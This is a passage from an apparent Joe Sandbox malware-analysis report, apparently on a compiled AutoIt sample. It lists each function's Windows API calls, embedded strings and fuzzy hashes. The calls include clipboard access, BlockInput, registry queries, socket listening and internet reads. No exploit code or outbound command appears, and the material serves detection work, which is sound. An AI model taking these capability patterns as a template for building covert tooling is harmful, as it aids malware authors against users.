RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000B0BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000B0C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 000B0E82
RegCloseKey.ADVAPI32(00000000), ref: 000B0E8F

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 1e1565bf69ec111558cff124ba861bb67e707ab24ad17fa3aac15332bf356988
Instruction ID: 5c60663ee742a73e48de4ad236a34b16be2399de91eed3a32d7caafd65765322
Opcode Fuzzy Hash: 1e1565bf69ec111558cff124ba861bb67e707ab24ad17fa3aac15332bf356988
Instruction Fuzzy Hash: 91E14B71604210AFCB55DF24C895EABBBE9EF89714F04896DF459DB2A2DB30EC01CB51

Function 000A4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 000A4857
EmptyClipboard.USER32 ref: 000A485D
GlobalAlloc.KERNEL32(00000002,?), ref: 000A4872
CloseClipboard.USER32 ref: 000A4911

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: e75d734ddaa608759c30d50d3827d55653e339df501b86bdb3cc9981ca6cb38b
Instruction ID: 8af089d9c274818aa4602b03b9726a0a75bafb28785e9f60acc75b730124d25b
Opcode Fuzzy Hash: e75d734ddaa608759c30d50d3827d55653e339df501b86bdb3cc9981ca6cb38b
Instruction Fuzzy Hash: D321B035201210DFFB11AF64EC49F6E77A8EF84721F108019F9469B2A2CB78AD10CB95

Function 000A696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000A69C7
WSAGetLastError.WSOCK32(00000000), ref: 000A69D6
bind.WSOCK32(00000000,?,00000010), ref: 000A69F2
listen.WSOCK32(00000000,00000005), ref: 000A6A01
WSAGetLastError.WSOCK32(00000000), ref: 000A6A1B
closesocket.WSOCK32(00000000,00000000), ref: 000A6A2F

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 6e267720087a51200d231aa5c3e50452c9437a65b5e83d572dd7e207ef389391
Instruction ID: 2b428c272ca5a880325061afd277ec443761d51878dd5822103c4e25105f8102
Opcode Fuzzy Hash: 6e267720087a51200d231aa5c3e50452c9437a65b5e83d572dd7e207ef389391
Instruction Fuzzy Hash: 7321D2346006019FDB10EFA8CC89E6EB7F9EF45720F148658E956AB392CB75AC05CB91

Function 0009C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0009C329
_wcscmp.LIBCMT ref: 0009C359
_wcscmp.LIBCMT ref: 0009C36E
FindNextFileW.KERNEL32(00000000,?), ref: 0009C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0009C3AF

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 9447fcc8e68a9124264ae065627382b48ef388161f2764606a25cbb2a1214db8
Instruction ID: 9cf36720e8e5c08a28438fbe1492a53f2d21b0715ba3696afcd6661b1fae64ae
Opcode Fuzzy Hash: 9447fcc8e68a9124264ae065627382b48ef388161f2764606a25cbb2a1214db8
Instruction Fuzzy Hash: E2517D75A046029FEB14DF68D490EAAB3E8FF49310F14861DF956CB3A2DB30AD04DB91

Function 000A29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 000A2AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 000A2AE4

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: f2372e3611484de48692e0826a405ef22159020b1cdc8a87b67e2d6a4756120a
Instruction ID: de45457e8638a99ab15f745d742c354cf98067c1faa0d419fab19495ca3ec43e
Opcode Fuzzy Hash: f2372e3611484de48692e0826a405ef22159020b1cdc8a87b67e2d6a4756120a
Instruction Fuzzy Hash: 0741D271A04609FFEB20DED8CC81EBFB7ECEB51724F10403AF605A6142EB709E419A61

Function 0009A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,000A9B52,?,000C098C,?), ref: 0009A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,000A9B52,?,000C098C,?), ref: 0009A6EC

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 7f140b38da12babceedebf0ccd87d2d8b9d29255d43f9b3d70a6f0d1d1befc17
Instruction ID: f5bbf807b320bdd4077e9e3d8ae0bc64c7cf56ec90c7c2ab725df59db1c7e0d6
Opcode Fuzzy Hash: 7f140b38da12babceedebf0ccd87d2d8b9d29255d43f9b3d70a6f0d1d1befc17
Instruction Fuzzy Hash: 10F0A73550422DFBEB20AFA4CC48FEA77ADFF09361F008255B918D6191D6309A50CBE1

Function 000A45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 000A45F0

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 3538f9be4dd4b261962517b4ae10e2964b75b30a20a99f2c72d2614a36ecedc3
Instruction ID: 056ce705f041ae3adc73c9689c09a9d0c0764f8671246914fbe09788adccf104
Opcode Fuzzy Hash: 3538f9be4dd4b261962517b4ae10e2964b75b30a20a99f2c72d2614a36ecedc3
Instruction Fuzzy Hash: 98E0DF352002059FD310AFAAE804E8AF7ECAF94760F008416FC09CB312DAB0FD00CB90

Function 00070722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00070734

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 7cc34507aa1ca77859cb38237889cb7275b87b502a80805ab23a0e8358ba0995
Instruction ID: 8db45e0368c603489a85e50ba9aa23e55eb4e48c5134f14e05e87b1aa1567dbe
Opcode Fuzzy Hash: 7cc34507aa1ca77859cb38237889cb7275b87b502a80805ab23a0e8358ba0995
Instruction Fuzzy Hash: F2C04CF1810109DBDB15DBA0D988EEE77BCAB04314F214155A105B2100D778AB44CA71

Function 000427FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00050FE6: std::exception::exception.LIBCMT ref: 0005101C
Part of subcall function 00050FE6: __CxxThrowException@8.LIBCMT ref: 00051031

__wcsnicmp.LIBCMT ref: 0004286A
__wcsnicmp.LIBCMT ref: 0004287E
__wcsnicmp.LIBCMT ref: 00042896
__wcsnicmp.LIBCMT ref: 000428AE
__wcsnicmp.LIBCMT ref: 000428C6
__wcsnicmp.LIBCMT ref: 000428DE
__wcsnicmp.LIBCMT ref: 000428F6
__wcsnicmp.LIBCMT ref: 0004290A
__wcsnicmp.LIBCMT ref: 00042948
__wcsnicmp.LIBCMT ref: 0004295C
__wcsnicmp.LIBCMT ref: 00042970
__wcsnicmp.LIBCMT ref: 00042984

Strings

#comments-start, xrefs: 000428F0, 00042942
#pragma compile, xrefs: 00042864
#cs, xrefs: 00042904, 00042956
#include, xrefs: 000428D8
#requireadmin, xrefs: 00042890
', xrefs: 0007FB9F
Cannot parse #include, xrefs: 0007FCE5
Unterminated group of comments, xrefs: 0007FCFA
#notrayicon, xrefs: 00042878
#comments-end, xrefs: 0004296A
Bad directive syntax error, xrefs: 0007FBD3, 0007FBF0
#ce, xrefs: 0004297E
", xrefs: 0007FB89
#OnAutoItStartRegister, xrefs: 000428A8
#include-once, xrefs: 000428C0

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 4e3f2dfb013f664993735a940bf525c05cf85671306be76165880a6fc9ca85a3
Instruction ID: e061ea7c0149915c9f533ecdafb9299b61b49a5e571cb6f3c3760140f3247842
Opcode Fuzzy Hash: 4e3f2dfb013f664993735a940bf525c05cf85671306be76165880a6fc9ca85a3
Instruction Fuzzy Hash: AAA18EB0B0020AABCB21EF61DD42EBF77A5AF44B40F444038FD05AA293EB719E55D758

Function 000BA041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 000BA0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 000BA1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 000BA1CC

Strings

0, xrefs: 000BA209

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: e138b3457718d1073b6de7bf029d2a6a9177f3cf412e84c2298d0b83a3f5b8ad
Instruction ID: 09e73dccdb02fb3798f82c2adbb8564a0fb3b77be5be750e1460f3a3c50924cd
Opcode Fuzzy Hash: e138b3457718d1073b6de7bf029d2a6a9177f3cf412e84c2298d0b83a3f5b8ad
Instruction Fuzzy Hash: 5902FF70208701AFEB65CF18C848FEABBE4FF86314F04861DF999962A1C779D944CB52

Function 0009498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0009499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 000949C2
_wcscpy.LIBCMT ref: 000949F0
_wcscmp.LIBCMT ref: 000949FB
_wcscat.LIBCMT ref: 00094A11
_wcsstr.LIBCMT ref: 00094A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00094A38
_wcscat.LIBCMT ref: 00094A81
_wcscat.LIBCMT ref: 00094A88
_wcsncpy.LIBCMT ref: 00094AB3

Strings

StringFileInfo\, xrefs: 00094A0B
\VarFileInfo\Translation, xrefs: 00094A30
04090000, xrefs: 00094A6E
%u.%u.%u.%u, xrefs: 00094B16
DefaultLangCodepage, xrefs: 00094A9B

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 73570f7107c2fbdd517d385568dabf4ccab4c100cd73ed891e72e29222c6fcac
Instruction ID: 2b50c100587e737381fd693923c300a79217dd820757e4253a58f07d854d3cd8
Opcode Fuzzy Hash: 73570f7107c2fbdd517d385568dabf4ccab4c100cd73ed891e72e29222c6fcac
Instruction Fuzzy Hash: D1411572A04204BAEB15B7749C43EFF77ACDF45761F000069FE04AA193EB74DA0697A5

Function 000B441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 000B44AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 000B456C

Strings

VIEWCHANGE, xrefs: 000B472B
ISSELECTED, xrefs: 000B4577
DESELECT, xrefs: 000B465A
GETSELECTEDCOUNT, xrefs: 000B454F
GETSELECTED, xrefs: 000B469A
SELECTALL, xrefs: 000B45D3
SELECTCLEAR, xrefs: 000B45EB
GETITEMCOUNT, xrefs: 000B44DE
FINDITEM, xrefs: 000B46DF
SELECT, xrefs: 000B4606
SELECTINVERT, xrefs: 000B463C
GETSUBITEMCOUNT, xrefs: 000B44F7
GETTEXT, xrefs: 000B4515

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 698da287731a91bc11e2279cd145c30c9cb61772f6ba5757e9c0d52c7f99b857
Instruction ID: 334fd07d28de9292e4ff4daa92cc0b055e1c4030d72bea3ab9d86a70fadb16d7
Opcode Fuzzy Hash: 698da287731a91bc11e2279cd145c30c9cb61772f6ba5757e9c0d52c7f99b857
Instruction Fuzzy Hash: E4A16C302146419FCB14EF24C951AAAB3A5FF85314F104968F8A69B3E3DB35ED09CB52

Function 0008CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0008CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0008CBBC
SetWindowTextW.USER32(?,?), ref: 0008CBD3
GetDlgItem.USER32(?,000003EA), ref: 0008CBE8
SetWindowTextW.USER32(00000000,?), ref: 0008CBEE
GetDlgItem.USER32(?,000003E9), ref: 0008CBFE
SetWindowTextW.USER32(00000000,?), ref: 0008CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0008CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0008CC3F
GetWindowRect.USER32(?,?), ref: 0008CC48
SetWindowTextW.USER32(?,?), ref: 0008CCB3
GetDesktopWindow.USER32 ref: 0008CCB9
GetWindowRect.USER32(00000000), ref: 0008CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0008CD0C
GetClientRect.USER32(?,?), ref: 0008CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0008CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0008CD69

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 152db26fd8d96c524c9dc987264956ba351def261443a533df94b3694465d313
Instruction ID: afa3c15fb83ba7e334424caf2b15325f86099d53c54c959680e7bde286451b08
Opcode Fuzzy Hash: 152db26fd8d96c524c9dc987264956ba351def261443a533df94b3694465d313
Instruction Fuzzy Hash: 4C515E70900709EFEB20EFA8CE89FAEBBF5FF04705F004528E586A25A0C774A954CB50

Function 000BA7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000BA87E
DestroyWindow.USER32(00000000,?), ref: 000BA8F8

Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000BA972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000BA994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000BA9A7
DestroyWindow.USER32(00000000), ref: 000BA9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00030000,00000000), ref: 000BAA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000BAA19
GetDesktopWindow.USER32 ref: 000BAA32
GetWindowRect.USER32(00000000), ref: 000BAA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000BAA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000BAA69

Part of subcall function 000329AB: GetWindowLongW.USER32(?,000000EB), ref: 000329BC

Strings

0, xrefs: 000BA894
tooltips_class32, xrefs: 000BA96B, 000BA9F9

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 9833d9b7f35e7892229e9b65648fafc3649b0a83e20cbc28024302effa883a3a
Instruction ID: 907f51b0efc04d32940db008fe6ce4dbb7e1ac6b3388f0e799f95f0c97fa3a0d
Opcode Fuzzy Hash: 9833d9b7f35e7892229e9b65648fafc3649b0a83e20cbc28024302effa883a3a
Instruction Fuzzy Hash: FD717971244204AFE721CF28CC49FAB77E5EB8A304F04461DF989972A1DB75AD06DB62

Function 000982D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0009831A
VariantCopy.OLEAUT32(00000000,?), ref: 00098323
VariantClear.OLEAUT32(00000000), ref: 0009832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0009841D
__swprintf.LIBCMT ref: 0009844D
VarR8FromDec.OLEAUT32(?,?), ref: 00098479
VariantInit.OLEAUT32(?), ref: 0009852A
SysFreeString.OLEAUT32(?), ref: 000985BE
VariantClear.OLEAUT32(?), ref: 00098618
VariantClear.OLEAUT32(?), ref: 00098627
VariantInit.OLEAUT32(00000000), ref: 00098665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00098447
Default, xrefs: 000984DA

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: e14b87818172dcf862ec69f0cda943cc49afc933fe96b1fe3ecbeae907eac5d2
Instruction ID: 689d07aab95f9f146c7519a6de42f902209988e01698b8891f9c3f6b485bcd75
Opcode Fuzzy Hash: e14b87818172dcf862ec69f0cda943cc49afc933fe96b1fe3ecbeae907eac5d2
Instruction Fuzzy Hash: 73D1BD71604515EBDF609FA5C884BBEB7B4BF06B00F14C155E805EB292DF34EA44EBA1

Function 000B49CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 000B4A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000B4AAC

Strings

EXISTS, xrefs: 000B4B15
CHECK, xrefs: 000B4ACC
GETTOTALCOUNT, xrefs: 000B4A93
SELECT, xrefs: 000B4C5D
COLLAPSE, xrefs: 000B4AF2
UNCHECK, xrefs: 000B4C88
ISCHECKED, xrefs: 000B4C2F
GETTEXT, xrefs: 000B4BFF
GETSELECTED, xrefs: 000B4BBC
GETITEMCOUNT, xrefs: 000B4B8E
EXPAND, xrefs: 000B4B5E

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

